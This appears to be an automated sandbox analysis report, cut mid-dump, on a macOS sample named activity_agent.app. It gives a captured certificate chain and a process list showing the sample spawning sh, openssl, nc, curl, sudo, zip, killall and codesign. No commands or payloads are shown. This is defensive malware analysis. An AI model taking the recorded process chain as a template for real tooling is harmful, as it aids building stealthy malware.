4F C7 11 9A C8 A8 F5 B5 37 EF 10 X<.l?O.......7..0080: 45 C6 6C D9 E0 5E 95 26 B3 EB AD A3 B9 EE 7F 0C E.l..^.&........0090: 9A 66 35 73 32 60 4E E5 DD 8A 61 2C 6E 52 11 77 .f5s2`N...a,nR.w00A0: 68 96 D3 18 75 51 15 00 1B 74 88 DD E1 C7 38 04 h...uQ...t....8.00B0: 43 28 E9 16 FD D9 05 D4 5D 47 27 60 D6 FB 38 3B C(......]G'`..8;00C0: 6C 72 A2 94 F8 42 1A DF ED 6F 06 8C 45 C2 06 00 lr...B...o..E...00D0: AA E4 E8 DC D9 B5 E1 73 78 EC F6 23 DC D1 DD 6C .......sx..#...l00E0: 8E 1A 8F A5 EA 54 7C 96 B7 C3 FE 55 8E 8D 49 5E .....T.....U..I^00F0: FC 64 BB CF 3E BD 96 EB 69 CD BF E0 48 F1 62 82 .d..>...i...H.b.0100: 10 E5 0C 46 57 F2 33 DA D0 C8 63 ED C6 1F 94 05 ...FW.3...c.....0110: 96 4A 1A 91 D1 F7 EB CF 8F 52 AE 0D 08 D9 3E A8 .J.......R....>.0120: A0 51 E9 C1 87 74 D5 C9 F7 74 AB 2E 53 FB BB 7A .Q...t...t..S..z0130: FB 97 E2 F8 1F 26 8F B3 D2 A0 E0 37 5B 28 3B 31 .....&.....7[(;10140: E5 0E 57 2D 5A B8 AD 79 AC 5E 20 66 1A A5 B9 A6 ..W-Z..y.^ f....0150: B5 39 C1 F5 98 43 FF EE F9 A7 A7 FD EE CA 24 3D .9...C........$=0160: 80 16 C4 17 8F 8A C1 60 A1 0C AE 5B 43 47 91 4B .......`...[CG.K0170: D5 9A 17 5F F9 D4 87 C1 C2 8C B7 E7 E2 0F 30 19 ..._..........0.0180: 37 86 AC E0 DC 42 03 E6 94 A8 9D AE FD 0F 24 51 7....B........$Q0190: 94 CE 92 08 D1 FC 50 F0 03 40 7B 88 59 ED 0E DD ......P..@..Y...01A0: AC D2 77 82 34 DC 06 95 02 D8 90 F9 2D EA 37 D5 ..w.4.......-.7.01B0: 1A 60 D0 67 20 D7 D8 42 0B 45 AF 82 68 DE DD 66 .`.g ..B.E..h..f01C0: 24 37 90 29 94 19 46 19 25 B8 80 D7 CB D4 86 28 $7.)..F.%......(01D0: 6A 44 70 26 23 62 A9 9F 86 6F BF BA 90 70 D2 56 jDp&#b...o...p.V01E0: 77 85 78 EF EA 25 A9 17 CE 50 72 8C 00 3A AA E3 w.x..%...Pr..:..01F0: DB 63 34 9F F8 06 71 01 E2 82 20 D4 FE 6F BD B1 .c4...q... ..o..]
Mai 9, 2017 16:26:37.713063955 MESZ4434929785.17.25.66192.168.0.50CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SETue May 30 12:48:38 CEST 2000Sat May 30 12:48:38 CEST 2020[[ Version: V3 Subject: CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB Signature Algorithm: SHA384withRSA, OID = 1.2.840.113549.1.1.12 Key: Sun RSA public key, 4096 bits modulus: 595250832037245141724642107398533641144111340640849154810839512193646804439589382557795096048235159392412856809181253983148280442751106836828767077478502910675291715965426418324395462826337195608826159904332409833532414343087397304684051488024083060971973988667565926401713702437407307790551210783180012029671811979458976709742365579736599681150756374332129237698142054260771585540729412505699671993111094681722253786369180597052805125225748672266569013967025850135765598233721214965171040686884703517711864518647963618102322884373894861238464186441528415873877499307554355231373646804211013770034465627350166153734933786011622475019872581027516832913754790596939102532587063612068091625752995700206528059096165261547017202283116886060219954285939324476288744352486373249118864714420341870384243932900936553074796547571643358129426474424573956572670213304441994994142333208766235762328926816055054634905252931414737971249889745696283503174642385591131856834241724878687870772321902051261453524679758731747154638983677185705464969589189761598154153383380395065347776922242683529305823609958629983678843126221186204478003285765580771286537570893899006127941280337699169761047271395591258462580922460487748761665926731923248227868312659 public exponent: 65537 Validity: [From: Tue May 30 12:48:38 CEST 2000, To: Sat May 30 12:48:38 CEST 2020] Issuer: CN=AddTrust External CA Root, OU=AddTrust External TTP Network, O=AddTrust AB, C=SE SerialNumber: [ 2766ee56 eb49f38e abd770a2 fc84de22]Certificate Extensions: 7[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.usertrust.com]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: AD BD 98 7A 34 B4 26 F7 FA C4 26 54 EF 03 BD E0 ...z4.&...&T....0010: 24 CB 54 1A $.T.]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:2147483647][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.usertrust.com/AddTrustExternalCARoot.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.5.29.32.0][] ]][6]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][7]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: BB AF 7E 02 3D FA A6 F1 3C 84 8E AD EE 38 98 EC ....=...<....8..0010: D9 32 32 D4 .22.]]] Algorithm: [SHA384withRSA] Signature:0000: 64 BF 83 F1 5F 9A 85 D0 CD B8 A1 29 57 0D E8 5A d..._......)W..Z0010: F7 D1 E9 3E F2 76 04 6E F1 52 70 BB 1E 3C FF 4D ...>.v.n.Rp..<.M0020: 0D 74 6A CC 81 82 25 D3 C3 A0 2A 5D 4C F5 BA 8B .tj...%...*]L...0030: A1 6D C4 54 09 75 C7 E3 27 0E 5D 84 79 37 40 13 .m.T.u..'.].y7@.0040: 77 F5 B4 AC 1C D0 3B AB 17 12 D6 EF 34 18 7E 2B w.....;.....4..+0050: E9 79 D3 AB 57 45 0C AF 28 FA D0 DB E5 50 95 88 .y..WE..(....P..0060: BB DF 85 57 69 7D 92 D8 52 CA 73 81 BF 1C F3 E6 ...Wi...R.s.....0070: B8 6E 66 11 05 B3 1E 94 2D 7F 91 95 92 59 F1 4C .nf.....-....Y.L0080: CE A3 91 71 4C 7C 47 0C 3B 0B 19 F6 A1 B1 6C 86 ...qL.G.;.....l.0090: 3E 5C AA C4 2E 82 CB F9 07 96 BA 48 4D 90 F2 94 >\.........HM...00A0: C8 A9 73 A2 EB 06 7B 23 9D DE A2 F3 4D 55 9F 7A ..s....#....MU.z00B0: 61 45 98 18 68 C7 5E 40 6B 23 F5 79 7A EF 8C B5 aE..h.^@k#.yz...00C0: 6B 8B B7 6F 46 F4 7B F1 3D 4B 04 D8 93 80 59 5A k..oF...=K....YZ00D0: E0 41 24 1D B2 8F 15 60 58 47 DB EF 6E 46 FD 15 .A$....`XG..nF..00E0: F5 D9 5F 9A B3 DB D8 B8 E4 40 B3 CD 97 39 AE 85 .._......@...9..00F0: BB 1D 8E BC DC 87 9B D1 A6 EF F1 3B 6F 10 38 6F ...........;o.8o]

System Behavior

General

Start time:16:25:39
Start date:09/05/2017
Path:/usr/libexec/xpcproxy
File size:42656 bytes
MD5 hash:d68b4c6f2056c73e1d3bd228bcd6d4ff

General

Start time:16:25:39
Start date:09/05/2017
Path:/Users/vreni/Desktop/unpack/activity_agent.app/Contents/MacOS/activity_agent
File size:468572 bytes
MD5 hash:6a2d0c8b20efc3fa283176a4bc76d6fd

General

Start time:16:25:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:39
Start date:09/05/2017
Path:/usr/bin/openssl
File size:922496 bytes
MD5 hash:1689d18d1f1b7b07480d337cc7fc9f43

General

Start time:16:25:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:39
Start date:09/05/2017
Path:/usr/bin/nc
File size:42400 bytes
MD5 hash:2cbc307230ad7cd8050109ea4f2bd078

General

Start time:16:25:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:39
Start date:09/05/2017
Path:/usr/bin/curl
File size:172016 bytes
MD5 hash:313ae871e04221163541c8af134351dc

General

Start time:16:25:44
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:46
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:46
Start date:09/05/2017
Path:/usr/bin/sudo
File size:168448 bytes
MD5 hash:7d986f7707c0f11264989cd7105ea80d

General

Start time:16:25:46
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:46
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:46
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:46
Start date:09/05/2017
Path:/usr/bin/sudo
File size:168448 bytes
MD5 hash:7d986f7707c0f11264989cd7105ea80d

General

Start time:16:25:46
Start date:09/05/2017
Path:/usr/bin/sudo
File size:168448 bytes
MD5 hash:7d986f7707c0f11264989cd7105ea80d

General

Start time:16:25:46
Start date:09/05/2017
Path:/bin/echo
File size:18032 bytes
MD5 hash:28aaba1826ce568b1eec9cf71ad0655c

General

Start time:16:25:46
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:46
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:46
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:46
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:47
Start date:09/05/2017
Path:/usr/bin/curl
File size:172016 bytes
MD5 hash:313ae871e04221163541c8af134351dc

General

Start time:16:25:48
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:48
Start date:09/05/2017
Path:/usr/bin/openssl
File size:922496 bytes
MD5 hash:1689d18d1f1b7b07480d337cc7fc9f43

General

Start time:16:25:48
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:48
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:48
Start date:09/05/2017
Path:/sbin/ping
File size:37232 bytes
MD5 hash:339ef1af4113dd065d43d939a1536151

General

Start time:16:25:59
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:59
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:25:59
Start date:09/05/2017
Path:/sbin/ping
File size:37232 bytes
MD5 hash:339ef1af4113dd065d43d939a1536151

General

Start time:16:26:11
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:11
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:11
Start date:09/05/2017
Path:/sbin/ping
File size:37232 bytes
MD5 hash:339ef1af4113dd065d43d939a1536151

General

Start time:16:26:13
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:13
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:13
Start date:09/05/2017
Path:/sbin/ping
File size:37232 bytes
MD5 hash:339ef1af4113dd065d43d939a1536151

General

Start time:16:26:14
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:14
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:14
Start date:09/05/2017
Path:/sbin/ping
File size:37232 bytes
MD5 hash:339ef1af4113dd065d43d939a1536151

General

Start time:16:26:15
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:15
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:15
Start date:09/05/2017
Path:/sbin/ping
File size:37232 bytes
MD5 hash:339ef1af4113dd065d43d939a1536151

General

Start time:16:26:16
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:16
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:16
Start date:09/05/2017
Path:/sbin/ping
File size:37232 bytes
MD5 hash:339ef1af4113dd065d43d939a1536151

General

Start time:16:26:17
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:17
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:17
Start date:09/05/2017
Path:/sbin/ping
File size:37232 bytes
MD5 hash:339ef1af4113dd065d43d939a1536151

General

Start time:16:26:23
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:23
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:23
Start date:09/05/2017
Path:/sbin/ping
File size:37232 bytes
MD5 hash:339ef1af4113dd065d43d939a1536151

General

Start time:16:26:29
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:29
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:29
Start date:09/05/2017
Path:/sbin/ping
File size:37232 bytes
MD5 hash:339ef1af4113dd065d43d939a1536151

General

Start time:16:26:30
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:30
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:30
Start date:09/05/2017
Path:/sbin/ping
File size:37232 bytes
MD5 hash:339ef1af4113dd065d43d939a1536151

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/mkdir
File size:18496 bytes
MD5 hash:00efa095a9110a312bf9115afb361764

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/chmod
File size:33904 bytes
MD5 hash:ecb64579c6dd0ebee31bf8e4d4cdcc6e

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/zip
File size:175408 bytes
MD5 hash:135ed1f0d2d93d1581715999e16cdeed

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/zip
File size:175408 bytes
MD5 hash:135ed1f0d2d93d1581715999e16cdeed

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/zip
File size:175408 bytes
MD5 hash:135ed1f0d2d93d1581715999e16cdeed

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/grep
File size:33712 bytes
MD5 hash:f7fe9c4af9294f2949377a12244b3d60

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/grep
File size:33712 bytes
MD5 hash:f7fe9c4af9294f2949377a12244b3d60

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/sed
File size:41984 bytes
MD5 hash:824cf059686109372fe70bf8d9c320dd

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/grep
File size:33712 bytes
MD5 hash:f7fe9c4af9294f2949377a12244b3d60

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/grep
File size:33712 bytes
MD5 hash:f7fe9c4af9294f2949377a12244b3d60

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/sed
File size:41984 bytes
MD5 hash:824cf059686109372fe70bf8d9c320dd

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/grep
File size:33712 bytes
MD5 hash:f7fe9c4af9294f2949377a12244b3d60

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/grep
File size:33712 bytes
MD5 hash:f7fe9c4af9294f2949377a12244b3d60

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/sed
File size:41984 bytes
MD5 hash:824cf059686109372fe70bf8d9c320dd

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/grep
File size:33712 bytes
MD5 hash:f7fe9c4af9294f2949377a12244b3d60

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/grep
File size:33712 bytes
MD5 hash:f7fe9c4af9294f2949377a12244b3d60

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/sed
File size:41984 bytes
MD5 hash:824cf059686109372fe70bf8d9c320dd

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/zip
File size:175408 bytes
MD5 hash:135ed1f0d2d93d1581715999e16cdeed

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/zip
File size:175408 bytes
MD5 hash:135ed1f0d2d93d1581715999e16cdeed

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/zip
File size:175408 bytes
MD5 hash:135ed1f0d2d93d1581715999e16cdeed

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/zip
File size:175408 bytes
MD5 hash:135ed1f0d2d93d1581715999e16cdeed

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/zip
File size:175408 bytes
MD5 hash:135ed1f0d2d93d1581715999e16cdeed

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/killall
File size:23872 bytes
MD5 hash:e27cce82be3cba31a2486d00964d1c5e

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/usr/bin/killall
File size:23872 bytes
MD5 hash:e27cce82be3cba31a2486d00964d1c5e

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/rm
File size:23744 bytes
MD5 hash:e8926d2347850b76f57a1d5f0226de8b

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/cp
File size:28832 bytes
MD5 hash:a8ebcee2d17317beee2136ec59bfba4d

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/mv
File size:24144 bytes
MD5 hash:7fb694b9a3c7fd27aa7fca81d5afdfeb

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/mv
File size:24144 bytes
MD5 hash:7fb694b9a3c7fd27aa7fca81d5afdfeb

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:36
Start date:09/05/2017
Path:/bin/mv
File size:24144 bytes
MD5 hash:7fb694b9a3c7fd27aa7fca81d5afdfeb

General

Start time:16:26:37
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:37
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:37
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:37
Start date:09/05/2017
Path:/usr/bin/curl
File size:172016 bytes
MD5 hash:313ae871e04221163541c8af134351dc

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/usr/bin/touch
File size:23248 bytes
MD5 hash:6e95af6ebd7fd2dd9a0e26654024db31

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/usr/bin/sed
File size:41984 bytes
MD5 hash:824cf059686109372fe70bf8d9c320dd

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/usr/bin/sed
File size:41984 bytes
MD5 hash:824cf059686109372fe70bf8d9c320dd

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/chmod
File size:33904 bytes
MD5 hash:ecb64579c6dd0ebee31bf8e4d4cdcc6e

General

Start time:16:26:39
Start date:09/05/2017
Path:/bin/sh
File size:632672 bytes
MD5 hash:2cc3c26641112c1bd0173f396b7d7662

General

Start time:16:26:39
Start date:09/05/2017
Path:/usr/bin/codesign
File size:98304 bytes
MD5 hash:08b2dc5c47c8081db031055901b32ccd

General

Start time:16:26:39
Start date:09/05/2017
Path:/usr/bin/codesign
File size:98304 bytes
MD5 hash:08b2dc5c47c8081db031055901b32ccd

General

Start time:16:26:39
Start date:09/05/2017
Path:/usr/bin/codesign_allocate
File size:18208 bytes
MD5 hash:c04b0c53dc3af4effd0731b9663a555d

General

Start time:16:26:39
Start date:09/05/2017
Path:/usr/libexec/DeveloperTools/codesign_allocate
